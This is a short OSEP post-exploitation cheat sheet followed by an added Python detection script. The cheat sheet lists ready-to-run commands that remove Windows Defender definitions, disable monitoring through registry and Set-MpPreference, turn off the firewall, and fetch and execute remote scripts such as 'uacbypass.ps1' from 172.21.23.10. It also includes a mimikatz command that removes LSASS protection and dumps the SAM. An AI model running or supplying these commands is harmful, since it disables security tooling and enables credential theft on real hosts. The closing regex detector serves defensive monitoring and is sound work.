OSEP Notes

Post Exploitation

Last updated 1 year ago

Disable AV

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -removedefinitions -all

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring " /t REG_DWORD /d 1 /f 
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring " /t REG_DWORD /d 1 /f

Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true 

NetSh Advfirewall set allprofiles state off

iex(new-object net.webclient).downloadstring('http://172.21.23.10/defendersdeath.ps1')
iex(new-object net.webclient).downloadstring('http://172.21.23.10/fuckdefender.ps1')

Restricted Admin RDP

New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0

Dump lsass

mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "token::elevate" "lsadump::sam" exit

Kill Defender via TrustedInstaller

iex(new-object net.webclient).downloadstring('http://172.21.23.10/uacbypass.ps1');alt
.\wsudo -T powershell
.\fuckdefender.ps1
reboot

FuckDefender.ps1
DefendersDeath.ps1
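
Detection side of the commands above, as an added example that is not part of the original notes: a small matcher that flags these command lines in process-creation telemetry (for instance Sysmon Event ID 1 or Security 4688 command-line fields) and groups hits per host. The rule names, the helper functions and the sample events are this example's own; the sample events are constructed, and the `/d 0` alternative in the Restricted Admin rule is an assumption covering the reg.exe form of the same change.

```python
import re

# Rule name -> regex over one process command line. Each pattern is derived
# from a command listed on this page; the rule names are this example's labels.
RULES = {
    "defender_definitions_removed": r'mpcmdrun(\.exe)?"?\s+.*-removedefinitions\b',
    "defender_policy_disable": r'\breg(\.exe)?"?\s+add\b.*\\policies\\microsoft\\windows defender.*/v\s+"?\s*disable\w+',
    "defender_pref_disable": r'set-mppreference\b.*-disable\w+\s+(\$true|1)\b',
    "firewall_all_profiles_off": r'\bnetsh(\.exe)?"?\s+advfirewall\s+set\s+allprofiles\s+state\s+off\b',
    "restricted_admin_enabled": r'disablerestrictedadmin\b.*(-value|/d)\s+0\b',
    "lsass_protection_removed": r'processprotect\s+/process:lsass(\.exe)?\s+/remove',
    "remote_script_iex": r'iex\s*\(\s*new-object\s+net\.webclient\s*\)\s*\.downloadstring\(',
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in RULES.items()}

def match_rules(command_line):
    """Return the sorted names of all rules that match one command line."""
    return sorted(n for n, rx in COMPILED.items() if rx.search(command_line))

def triage(events):
    """Group rule hits per host so several tamper actions on one host stand out."""
    hits = {}
    for host, command_line in events:
        for rule in match_rules(command_line):
            hits.setdefault(host, set()).add(rule)
    return {host: sorted(rules) for host, rules in hits.items()}

# Constructed sample telemetry as (hostname, command line) pairs. The WS02
# lines are benign look-alikes that must not be flagged.
SAMPLE_EVENTS = [
    ("WS01", r'cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -removedefinitions -all'),
    ("WS01", r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f'),
    ("WS01", r'NetSh Advfirewall set allprofiles state off'),
    ("WS02", r'powershell Set-MpPreference -DisableRealtimeMonitoring $false'),
    ("WS02", r'netsh advfirewall show allprofiles'),
    ("SRV03", r'powershell New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0'),
]

if __name__ == "__main__":
    for host, rules in triage(SAMPLE_EVENTS).items():
        print(host, rules)
```

The download-cradle rule is the noisiest of the set, so it is most useful when it fires on the same host as one of the Defender or firewall rules.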